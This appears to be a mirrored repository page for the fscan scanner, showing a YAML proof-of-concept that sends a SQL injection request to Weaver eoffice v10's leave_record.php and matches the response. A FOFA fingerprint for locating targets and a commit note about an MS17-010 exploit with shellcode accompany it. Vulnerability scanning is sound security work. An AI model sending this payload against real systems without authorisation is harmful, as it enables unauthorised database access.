admin/fscan
1
0
Fork 0
mirror of https://github.com/shadow1ng/fscan.git synced 2025-11-05 10:45:27 +00:00
Code Issues Packages Projects Releases Wiki Activity
fscan/WebScan/pocs/e-office-v10-sql-inject.yml

15 lines
523 B
YAML
Raw Permalink Normal View History

加强poc fuzz模块,支持跑备份文件、目录、shiro-key(默认跑10key,可用-full参数跑100key)等。新增ms17017利用(使用参数: -sc add),可在ms17010-exp.go自定义shellcode,内置添加用户等功能。 新增poc、指纹。支持socks5代理。因body指纹更全,默认不再跑ico图标。
2022-07-02 17:25:15 +08:00
name: e-office-v10-sql-inject
rules:
- method: GET
path: /eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b'<p>未找到相关数据</p>')
detail:
author: Print1n(https://github.com/Print1n)
description: |
泛微 eoffice v10 前台 SQL 注入
FOFAfid="2csJpuWtfTdSAavIfJTuBw=="
links:
- https://www.hedysx.com/2777.html
Reference in New Issue Copy Permalink